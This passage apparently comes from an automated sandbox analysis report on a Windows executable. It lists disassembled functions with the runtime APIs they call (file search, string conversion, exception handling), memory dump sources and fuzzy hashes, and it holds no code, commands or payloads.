                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                                          • Instruction ID: 5cc9fbc377a8edd18052cd309e2491e7e5261e33df1ea5397c964cc53598f3eb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 940c0e5d6642d71f3349d6853f9f47a4d852d201499cf18fcd482ab34cbb11e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06023A71E012199FDF14DFA8C9806AEBBF1FF48324F258269E919E7381D731A945CB90
                                                                                                                                                                                                                                                                          Function 008963B5 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008964A5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                          • Opcode ID: c7cc4b65f01fef92bb14e3c9407c4bd2a5b774bfe956229116018a218de03514
                                                                                                                                                                                                                                                                          • Instruction ID: de62bcfd6dbb507daa0bc9afc55286812e010e5a0c78df76a3c8fe22f7d1cb50
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7cc4b65f01fef92bb14e3c9407c4bd2a5b774bfe956229116018a218de03514
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A171F2B1C05169AFDF21BF688C89ABEBBB8FB05304F1841D9E009D3211EB318E949F15
                                                                                                                                                                                                                                                                          Function 00884073 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0088407F
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0088414B
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00884164
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0088416E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56faaa7fb1a4a986132fa81e201d9031a247fb080bfc937a0b43ff3d302af080
                                                                                                                                                                                                                                                                          • Instruction ID: 23cf10d9ceef9fbd6bb6503d3d26e2fc021b1499f231d1551b0cddc67ad3abd7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56faaa7fb1a4a986132fa81e201d9031a247fb080bfc937a0b43ff3d302af080
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE31F776D012199BDB20EFA4D9897CDBBB8FF18300F1041AAE50DAB250EB759A84DF45
                                                                                                                                                                                                                                                                          Function 0089EDF2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0089EDDD,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0089EE98
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0089EF53
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0089EFE2
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F02D
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F033
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F069
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F06F
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 0089F07F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 127012223-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0be7d32f8e0ca54c880b7d84778ddf8caa804f15350d8e73760853262c11dfac
                                                                                                                                                                                                                                                                          • Instruction ID: a05629fd7fe28c8fb1901a22008f37e2ada5659e423fe51c5047002345626d08
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be7d32f8e0ca54c880b7d84778ddf8caa804f15350d8e73760853262c11dfac
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF71B3729006099FDF24FA688C41BAF7BA9FF49314F2D0169EA05E7283DB769C418761
                                                                                                                                                                                                                                                                          Function 008845A9 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 008845F0
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0088461C
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0088465B
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00884678
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008846B7
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 008846D4
                                                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00884716
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00884739
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                          • Opcode ID: fa0e246cb169483196fa0f5713ec2f1f6365a742636895b4786ab4b7a98d1172
                                                                                                                                                                                                                                                                          • Instruction ID: 8ce6851da5f46b912b9b0d17a702892be3f061406fb3ff8009fd08cf3da0668a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa0e246cb169483196fa0f5713ec2f1f6365a742636895b4786ab4b7a98d1172
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C518D7360020BAFEF20BFA4CC45FAA7AA9FF56744F254429F915DA190EB34DC008B61
                                                                                                                                                                                                                                                                          Function 00893332 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                          • Opcode ID: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                                          • Instruction ID: 1cba27cd7edafde185ef47e0c652e250532108843659d7cd83fc787415ce6ff8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28ab9ecce4e15e3143315e353018c5f3af88507dfb5dc82ed59a1ff67c68ab01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AB14572A00355AFDF12AF28C881BAE7BA5FF69710F1D4165E904EB382D2709A01C7A5
                                                                                                                                                                                                                                                                          Function 00885440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885477
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0088547F
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885508
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00885533
                                                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00885588
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: 7611f776bdbbed4d061ac8a4944f7cf40d5d009c8e39b4cc87ddecd4be8394c4
                                                                                                                                                                                                                                                                          • Instruction ID: 8440f4ff0f84b9d195af8f4b5660a044d3c2014794e52633733adf6b4e72ede3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7611f776bdbbed4d061ac8a4944f7cf40d5d009c8e39b4cc87ddecd4be8394c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D41C274A006189FCF10EF6CC884A9EBBA1FF05328F148195E918DB752D731DA52CF96
                                                                                                                                                                                                                                                                          Function 008913F9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00891508,008731F2,?,00000000,?), ref: 008914BA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: 030678f209cc68276cbeef07dde3c2b358367292206653b86b77e62bff111ac0
                                                                                                                                                                                                                                                                          • Instruction ID: 35335aeb78567b456f506345d155861c14dd43b5e91fabc90814a4e303f23629
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 030678f209cc68276cbeef07dde3c2b358367292206653b86b77e62bff111ac0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6212B31A05212ABEF21AB65EC48A5A3769FB87774F2D0150E915E76D0EB30ED01C6D4
                                                                                                                                                                                                                                                                          Function 008847BB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008847C1
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 008847CF
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 008847E0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                          • Opcode ID: 560ec38650c81334fd84b2255ed706e85aab3b6541cac9e575586fbb272b9b06
                                                                                                                                                                                                                                                                          • Instruction ID: 3cc47adef8d79b8b386a9d42c0fea44bfaec723ffd2237a2b5dcfc5d91552e81
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 560ec38650c81334fd84b2255ed706e85aab3b6541cac9e575586fbb272b9b06
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D09E71D55210AFB3145FB4BD4D8557AA4FB076213010465F911D2EA4EBB84801DA6E
                                                                                                                                                                                                                                                                          Function 00898F96 Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 358f0987a3d61b5e4a30afd1aa3c013207c482762cc0a6c4ca4ea9fee5d7bd28
                                                                                                                                                                                                                                                                          • Instruction ID: 906ff7366ad40dfc05f4f5afff79190800f6fe04391df9d506aff6ddf0bef31d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 358f0987a3d61b5e4a30afd1aa3c013207c482762cc0a6c4ca4ea9fee5d7bd28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEB1EE70A04249ABEF15EFDCC881BAD7BB4FF5A314F18426CE995DB292C7309941CB61
                                                                                                                                                                                                                                                                          Function 0088F2AC Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0088F2A3,00884E61,008841CC), ref: 0088F2BA
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0088F2C8
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0088F2E1
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0088F2A3,00884E61,008841CC), ref: 0088F333
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8e9ad44cd36b5df411ddc0e9360032e1cf212b9573cf9d37d849956e2b7208c3
                                                                                                                                                                                                                                                                          • Instruction ID: 559fbc1974bf0f10ba3a4e57278cabd79a0c1e92a8a84e0df616f30746cd2d79
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9ad44cd36b5df411ddc0e9360032e1cf212b9573cf9d37d849956e2b7208c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF0171322093115EAA2836B8BC8596B2A95FB12775F24023DF610D5DF2EB554C019392
                                                                                                                                                                                                                                                                          Function 0088FB24 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 0088FC43
                                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0088FEBC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                          • Opcode ID: 16f1728ddcc8eaabb820243a9be909e251dec150e7a593264c15d811db62fd25
                                                                                                                                                                                                                                                                          • Instruction ID: 8e273917b4b602e81e6a17de2afb821d772a1fc9b46d08c25ee90e354cb98918
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16f1728ddcc8eaabb820243a9be909e251dec150e7a593264c15d811db62fd25
